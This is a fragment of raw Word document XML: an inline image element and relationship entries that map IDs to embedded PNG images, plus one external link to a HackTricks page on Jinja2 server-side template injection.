          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="3530600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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1.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.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